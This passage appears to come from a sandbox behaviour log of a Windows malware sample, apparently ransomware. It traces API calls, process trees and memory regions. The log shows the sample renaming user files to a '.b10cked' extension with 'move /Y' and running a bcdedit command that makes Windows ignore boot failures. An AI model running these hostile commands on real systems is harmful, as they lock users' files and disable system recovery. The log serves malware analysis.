_String2="LOGONSE", _MaxCount=0x7) returned -9 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0215.509] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0215.510] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0215.510] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0215.510] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0215.510] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0215.510] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0215.510] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0215.510] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0215.510] _wcsnicmp (_String1="/Y", _String2="/Y", 
_MaxCount=0x2) returned 0 [0215.510] _wcsicmp (_String1="MSN.url", _String2=".") returned 63 [0215.510] _wcsicmp (_String1="MSN.url", _String2="..") returned 63 [0215.510] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn.url")) returned 0x20 [0215.510] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3c1e30 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.510] SetErrorMode (uMode=0x0) returned 0x0 [0215.510] SetErrorMode (uMode=0x1) returned 0x0 [0215.510] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url", nBufferLength=0x104, lpBuffer=0x26eb7c, lpFilePart=0x26eb64 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url", lpFilePart=0x26eb64*="MSN.url") returned 0x2a [0215.510] SetErrorMode (uMode=0x0) returned 0x1 [0215.510] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1" (normalized: "c:\\users\\default\\favori~1\\msnweb~1")) returned 0x12 [0215.511] _wcsicmp (_String1="MSN.url", _String2=".") returned 63 [0215.511] _wcsicmp (_String1="MSN.url", _String2="..") returned 63 [0215.511] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn.url")) returned 0x20 [0215.511] SetErrorMode (uMode=0x0) returned 0x0 [0215.511] SetErrorMode (uMode=0x1) returned 0x0 [0215.511] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url", nBufferLength=0x104, lpBuffer=0x26eff8, lpFilePart=0x26ed90 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url", lpFilePart=0x26ed90*="MSN.url") returned 0x2a [0215.511] SetErrorMode (uMode=0x0) returned 0x1 [0215.511] SetErrorMode (uMode=0x0) returned 0x0 [0215.511] SetErrorMode (uMode=0x1) returned 0x0 [0215.511] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url.b10cked", nBufferLength=0x104, lpBuffer=0x26f200, 
lpFilePart=0x26ed90 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url.b10cked", lpFilePart=0x26ed90*="MSN.url.b10cked") returned 0x32 [0215.511] SetErrorMode (uMode=0x0) returned 0x1 [0215.511] SetLastError (dwErrCode=0x0) [0215.511] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn.url.b10cked")) returned 0xffffffff [0215.511] GetLastError () returned 0x2 [0215.511] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url", fInfoLevelId=0x1, lpFindFileData=0x26e70c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e70c) returned 0x3b0e50 [0215.511] FindNextFileW (in: hFindFile=0x3b0e50, lpFindFileData=0x26e70c | out: lpFindFileData=0x26e70c) returned 0 [0215.512] GetLastError () returned 0x12 [0215.512] FindClose (in: hFindFile=0x3b0e50 | out: hFindFile=0x3b0e50) returned 1 [0215.513] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url", fInfoLevelId=0x1, lpFindFileData=0x3c1bd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3c1bd0) returned 0x3b0e50 [0215.513] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url.b10cked", nBufferLength=0x104, lpBuffer=0x26e9a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url.b10cked", lpFilePart=0x0) returned 0x32 [0215.513] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url", nBufferLength=0x104, lpBuffer=0x26e9a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url", lpFilePart=0x0) returned 0x2a [0215.513] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn.url")) returned 0x20 [0215.513] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url" (normalized: 
"c:\\users\\default\\favori~1\\msnweb~1\\msn.url"), lpNewFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn.url.b10cked"), dwFlags=0x3) returned 1 [0215.513] FindClose (in: hFindFile=0x3b0e50 | out: hFindFile=0x3b0e50) returned 1 [0215.513] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26e958 | out: _Buffer=" 1") returned 9 [0215.513] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.513] GetFileType (hFile=0x7) returned 0x2 [0215.514] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0215.514] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26e8e4 | out: lpMode=0x26e8e4) returned 1 [0215.514] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.514] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26e918 | out: lpConsoleScreenBufferInfo=0x26e918) returned 1 [0215.514] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0215.514] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x26e958 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0215.514] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x26e93c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x26e93c*=0x1a) returned 1 [0215.599] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.599] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0215.599] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.599] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0215.599] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.599] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 
[0215.599] SetConsoleInputExeNameW () returned 0x1 [0215.599] GetConsoleOutputCP () returned 0x1b5 [0215.599] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.599] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.599] exit (_Code=0) Process: id = "538" image_name = "bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0x7ea16800" os_pid = "0xd08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "322" os_parent_pid = "0xb68" cmd_line = "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31782 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31783 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31784 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31785 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 31786 start_va = 0xd70000 end_va = 0xdb9fff entry_point = 0xd70000 region_type = mapped_file name = "bcdedit.exe" filename = "\\Windows\\System32\\bcdedit.exe" (normalized: "c:\\windows\\system32\\bcdedit.exe") Region: id = 31787 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 
region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31788 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31789 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31790 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 31791 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31792 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31793 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31794 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31795 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 31796 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 31797 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31798 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type 
= mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 31799 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31800 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 31801 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31802 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 31803 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 739 os_tid = 0xa8c Process: id = "539" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c00" os_pid = "0xb64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNSPO~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Sports.url.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT 
AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31772 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31773 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31774 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31775 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 31776 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31777 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31778 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31779 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31780 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 31781 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31902 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31903 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31904 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31905 start_va = 0x110000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 31906 start_va = 0x430000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 31907 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31908 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31909 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31910 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31911 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31912 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name 
= "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31913 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31914 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31915 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31916 start_va = 0x120000 end_va = 0x1e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 31917 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31918 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31919 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31920 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 31921 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 31922 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 31923 start_va = 0x2f0000 end_va = 0x3f0fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 31924 start_va = 0x530000 end_va = 0x112ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 31925 start_va = 0x1130000 end_va = 0x1292fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Thread: id = 738 os_tid = 0xc94 [0215.457] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efc2c | out: lpSystemTimeAsFileTime=0x2efc2c*(dwLowDateTime=0xb5388d60, dwHighDateTime=0x1d440a9)) [0215.457] GetCurrentProcessId () returned 0xb64 [0215.457] GetCurrentThreadId () returned 0xc94 [0215.457] GetTickCount () returned 0x3c4e3 [0215.457] QueryPerformanceCounter (in: lpPerformanceCount=0x2efc24 | out: lpPerformanceCount=0x2efc24*=27224625907) returned 1 [0215.458] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0215.458] __set_app_type (_Type=0x1) [0215.458] __p__fmode () returned 0x76b331f4 [0215.458] __p__commode () returned 0x76b331fc [0215.458] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0215.458] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0215.458] GetCurrentThreadId () returned 0xc94 [0215.458] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc94) returned 0x38 [0215.458] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0215.458] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0215.458] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.458] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0215.458] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, 
phkResult=0x2efbbc | out: phkResult=0x2efbbc*=0x0) returned 0x2 [0215.458] VirtualQuery (in: lpAddress=0x2efbf3, lpBuffer=0x2efb8c, dwLength=0x1c | out: lpBuffer=0x2efb8c*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.458] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efb8c, dwLength=0x1c | out: lpBuffer=0x2efb8c*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0215.458] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efb8c, dwLength=0x1c | out: lpBuffer=0x2efb8c*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0215.458] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efb8c, dwLength=0x1c | out: lpBuffer=0x2efb8c*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.458] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efb8c, dwLength=0x1c | out: lpBuffer=0x2efb8c*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0215.459] GetConsoleOutputCP () returned 0x1b5 [0215.459] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.459] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0215.459] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.459] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0215.459] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.459] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0215.459] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.459] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0215.459] _get_osfhandle 
(_FileHandle=0) returned 0x3 [0215.459] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0215.459] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.459] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0215.460] GetEnvironmentStringsW () returned 0x440198* [0215.460] FreeEnvironmentStringsW (penv=0x440198) returned 1 [0215.460] GetEnvironmentStringsW () returned 0x440198* [0215.460] FreeEnvironmentStringsW (penv=0x440198) returned 1 [0215.460] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eeb2c | out: phkResult=0x2eeb2c*=0x40) returned 0x0 [0215.460] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eeb34, lpData=0x2eeb38, lpcbData=0x2eeb30*=0x1000 | out: lpType=0x2eeb34*=0x0, lpData=0x2eeb38*=0xc0, lpcbData=0x2eeb30*=0x1000) returned 0x2 [0215.460] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eeb34, lpData=0x2eeb38, lpcbData=0x2eeb30*=0x1000 | out: lpType=0x2eeb34*=0x4, lpData=0x2eeb38*=0x1, lpcbData=0x2eeb30*=0x4) returned 0x0 [0215.460] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eeb34, lpData=0x2eeb38, lpcbData=0x2eeb30*=0x1000 | out: lpType=0x2eeb34*=0x0, lpData=0x2eeb38*=0x1, lpcbData=0x2eeb30*=0x1000) returned 0x2 [0215.460] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eeb34, lpData=0x2eeb38, lpcbData=0x2eeb30*=0x1000 | out: lpType=0x2eeb34*=0x4, lpData=0x2eeb38*=0x0, lpcbData=0x2eeb30*=0x4) returned 0x0 [0215.460] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eeb34, lpData=0x2eeb38, lpcbData=0x2eeb30*=0x1000 | out: lpType=0x2eeb34*=0x4, lpData=0x2eeb38*=0x40, lpcbData=0x2eeb30*=0x4) returned 0x0 [0215.460] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, 
lpType=0x2eeb34, lpData=0x2eeb38, lpcbData=0x2eeb30*=0x1000 | out: lpType=0x2eeb34*=0x4, lpData=0x2eeb38*=0x40, lpcbData=0x2eeb30*=0x4) returned 0x0 [0215.460] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eeb34, lpData=0x2eeb38, lpcbData=0x2eeb30*=0x1000 | out: lpType=0x2eeb34*=0x0, lpData=0x2eeb38*=0x40, lpcbData=0x2eeb30*=0x1000) returned 0x2 [0215.460] RegCloseKey (hKey=0x40) returned 0x0 [0215.460] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eeb2c | out: phkResult=0x2eeb2c*=0x40) returned 0x0 [0215.460] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eeb34, lpData=0x2eeb38, lpcbData=0x2eeb30*=0x1000 | out: lpType=0x2eeb34*=0x0, lpData=0x2eeb38*=0x40, lpcbData=0x2eeb30*=0x1000) returned 0x2 [0215.460] RegQueryValueExW 